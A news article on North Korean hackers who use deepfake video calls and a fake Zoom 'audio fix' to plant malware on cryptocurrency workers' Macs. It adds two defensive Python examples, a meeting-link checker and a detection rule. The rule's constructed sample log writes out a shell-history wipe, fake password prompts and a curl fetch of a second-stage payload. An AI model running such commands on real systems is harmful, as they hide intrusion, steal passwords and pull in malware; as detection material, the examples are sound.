
North Korean Cybercriminals Deploy Deepfake Technology in Targeted Attacks on Cryptocurrency Professionals


North Korean Hackers Exploit Live Video Calls

Hackers linked to North Korea are using live video calls, in some cases with AI-generated video of the caller, to manipulate people working in cryptocurrency into installing malware on their devices. Martin Kuchař, co-founder of BTC Prague, recently described an incident in which the attackers combined a compromised Telegram account with a carefully staged video call to deliver malware disguised as an audio fix for Zoom.

Details of the Cyber Attack

Kuchař described the attack in a post on X on Thursday, noting that the operation appears to target primarily users of Bitcoin and other cryptocurrencies. The attackers make first contact with a potential victim and arrange a meeting on Zoom or Microsoft Teams. During the call they use AI-generated video to impersonate people the victim knows, creating a false sense of trust.

Once the victim is on the call, the attackers claim to have audio problems and urge the victim to install a supposed plugin to fix them. The "plugin" is malware that gives the attackers remote control of the victim's system. From there they can steal bitcoin, take over the victim's Telegram account, and use that account to lure the victim's contacts in turn.

Escalating Crypto-Related Losses

The wider context is troubling: AI-enhanced impersonation scams, built on deepfake video, cloned voices and fabricated identities, have pushed crypto-related losses to a staggering $17 billion in 2025 alone. Chainalysis, a blockchain analytics firm, has documented this growth in fraudulent activity.

Previous Findings and Techniques

Kuchař's experience matches findings that Huntress, a cybersecurity firm, published as early as July last year on the same technique. Huntress described attackers who first engage a crypto-company employee on Telegram, then lure them into a fake Zoom meeting, frequently via deceptive meeting links that appear to point at legitimate Zoom domains. During the call the attackers tell the victim to download a supposed audio fix, which starts a chain of malicious downloads and executions.
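As an added example (not from the article or from Huntress) of the check a recipient, or a mail or chat gateway, could apply to a meeting invitation before anyone clicks it, the Python below accepts a link only if it is HTTPS, carries no userinfo trick, and has a host that is exactly, or a proper subdomain of, a trusted meeting domain. The trusted-domain list and the sample invitations are assumptions constructed for this example.

```python
from urllib.parse import urlsplit

# Domains whose meeting links are accepted. This list is an assumption for the
# example; populate it with the platforms your organisation actually uses.
TRUSTED_MEETING_DOMAINS = ("zoom.us", "teams.microsoft.com")


def _under_domain(host: str, domain: str) -> bool:
    """True only if host is `domain` itself or a subdomain of it.

    Matching on the label boundary ('.' + domain) is what defeats lookalikes
    such as zoom.us.attacker.example or notzoom.us, which a plain substring
    test would accept.
    """
    return host == domain or host.endswith("." + domain)


def check_meeting_link(url: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a meeting invitation URL."""
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() != "https":
        return False, f"scheme is {parts.scheme or 'missing'!r}, expected https"
    # 'https://zoom.us@evil.example/' puts the real host after the '@'.
    if parts.username is not None or parts.password is not None:
        return False, "URL carries userinfo; the host shown is not the real host"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "URL has no host"
    if any(label.startswith("xn--") for label in host.split(".")):
        return False, f"host {host!r} uses punycode; possible homoglyph domain"
    for domain in TRUSTED_MEETING_DOMAINS:
        if _under_domain(host, domain):
            return True, f"host {host!r} is under trusted domain {domain!r}"
    return False, f"host {host!r} is not a trusted meeting domain"


if __name__ == "__main__":
    # Constructed sample invitations: one genuine-looking link and several
    # lookalikes of the kind the article describes.
    samples = [
        "https://us02web.zoom.us/j/1234567890",
        "https://zoom.us.meeting-audio-fix.example/j/1234567890",
        "https://zoom.us@meeting-audio-fix.example/j/1234567890",
        "http://zoom.us/j/1234567890",
        "https://zoom-us.example/j/1234567890",
    ]
    for link in samples:
        ok, why = check_meeting_link(link)
        print(f"{'ACCEPT' if ok else 'REJECT'}  {link}  ({why})")
```

The point of the label-boundary match is that "contains zoom.us" is exactly the test a lookalike domain is built to pass; only the registrable domain at the right-hand end of the host tells you who controls the page, and a link that passes this check still says nothing about who is on the other end of the call.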

The lure typically delivers an AppleScript that starts a multi-stage infection on macOS. Once run, the script erases the shell history, checks for Rosetta 2 on Apple Silicon Macs and installs it if missing, and repeatedly prompts for the user's password in order to gain elevated privileges. The chain can then drop a range of tools, including backdoors, keyloggers, clipboard monitors and cryptocurrency wallet stealers. Kuchař reported that his own compromised Telegram account was later used to target others in the same way.
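As an added example, not from the article, Huntress or Kuchař, the Python below shows how the behaviours just described could be correlated in endpoint process telemetry: it walks the process tree under each osascript run of a script file and counts the indicators among its descendants (shell-history wipe, Rosetta 2 install, repeated hidden-answer password dialogs, downloads), alerting when several co-occur or when the password prompt repeats. The JSON-lines event format, the command strings and the log itself are constructed for the example and are assumptions about how those behaviours would surface, not real telemetry or signatures from a real sample.

```python
import json
import re
from collections import defaultdict

# Constructed process-event log (JSON lines), modelled on what an endpoint
# agent would record. Not real telemetry; pids, paths and hosts are made up.
SAMPLE_EVENTS = r"""
{"ts": 100, "pid": 500, "ppid": 300, "user": "alice", "cmd": "osascript /Users/alice/Downloads/zoom_audio_fix.scpt"}
{"ts": 101, "pid": 501, "ppid": 500, "user": "alice", "cmd": "sh -c 'rm -f ~/.zsh_history ~/.bash_history; history -c'"}
{"ts": 102, "pid": 502, "ppid": 500, "user": "alice", "cmd": "sh -c 'softwareupdate --install-rosetta --agree-to-license'"}
{"ts": 103, "pid": 503, "ppid": 500, "user": "alice", "cmd": "osascript -e 'display dialog \"Zoom needs your password to repair audio\" default answer \"\" with hidden answer'"}
{"ts": 104, "pid": 504, "ppid": 500, "user": "alice", "cmd": "osascript -e 'display dialog \"Zoom needs your password to repair audio\" default answer \"\" with hidden answer'"}
{"ts": 105, "pid": 505, "ppid": 500, "user": "alice", "cmd": "osascript -e 'display dialog \"Zoom needs your password to repair audio\" default answer \"\" with hidden answer'"}
{"ts": 106, "pid": 506, "ppid": 500, "user": "alice", "cmd": "curl -fsSL https://updates.example/stage2 -o /tmp/.stage2"}
{"ts": 200, "pid": 600, "ppid": 300, "user": "bob", "cmd": "osascript /Users/bob/scripts/rename_photos.scpt"}
{"ts": 201, "pid": 601, "ppid": 600, "user": "bob", "cmd": "sh -c 'mv IMG_0001.jpg trip_01.jpg'"}
"""

# Indicator patterns for the behaviours the article attributes to the dropper.
# The exact command strings are assumptions about how those behaviours would
# appear in process telemetry, not signatures taken from a real sample.
INDICATORS = {
    "history_wipe": re.compile(r"\brm\b[^;|&]*\.(?:zsh|bash)_history|\bhistory\s+-c\b"),
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),
    "password_prompt": re.compile(r"display dialog\b.*\bwith hidden answer"),
    "download": re.compile(r"\b(?:curl|wget)\b"),
}
# An osascript run of a script file, as opposed to an inline `osascript -e`.
SCRIPT_ROOT = re.compile(r"^osascript\s+(?!-e\b)(\S+)")


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def descendants(root_pid, children):
    """All pids below root_pid in the process tree (breadth-first)."""
    seen, queue = [], [root_pid]
    while queue:
        pid = queue.pop(0)
        for child in children.get(pid, []):
            if child not in seen:
                seen.append(child)
                queue.append(child)
    return seen


def analyze(events_text, min_distinct=2, min_prompts=2):
    """Return one alert per script-file osascript root whose subtree matches."""
    events = parse_events(events_text)
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])

    alerts = []
    for root in events:
        m = SCRIPT_ROOT.match(root["cmd"])
        if not m:
            continue
        counts = {name: 0 for name in INDICATORS}
        for pid in descendants(root["pid"], children):
            cmd = by_pid[pid]["cmd"]
            for name, pattern in INDICATORS.items():
                if pattern.search(cmd):
                    counts[name] += 1
        # Alert when distinct behaviours co-occur under one script, or when the
        # script keeps re-prompting for a password (a credential-harvesting loop).
        distinct = sum(1 for c in counts.values() if c)
        if distinct >= min_distinct or counts["password_prompt"] >= min_prompts:
            alerts.append({"root_pid": root["pid"], "user": root["user"],
                           "script": m.group(1), "indicators": counts})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Any single indicator here is weak on its own (users clear their history, and Rosetta 2 gets installed legitimately), which is why the rule keys on co-occurrence under one script-file execution and on the repeated hidden-answer dialog; in production you would also bound the correlation by time and account for pid reuse, which this example ignores.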

Link to Advanced Persistent Threats

Huntress analysts have attributed this activity with high confidence to the advanced persistent threat tracked as TA444, also known as BlueNoroff, a subgroup of the Lazarus Group, the state-sponsored organization implicated in cryptocurrency theft since approximately 2017. Asked about the motive behind these attacks, Shān Zhang, Chief Information Security Officer at the blockchain security firm Slowmist, said they likely tie into the broader objectives of the Lazarus Group's ongoing campaigns.

Importance of Verification and Prevention

David Liberman, co-founder of the decentralized AI compute network Gonka, said clear patterns run across these hacking schemes, with specific wallets targeted and nearly identical installation scripts used consistently. He stressed the importance of verifying the authenticity of images and video, proposing that digital content bear cryptographic signatures from its creators, secured by multi-factor authentication, to prevent these types of scams. Because these attacks rely on social manipulation, understanding the narratives they use has become critical to detecting and preventing them.
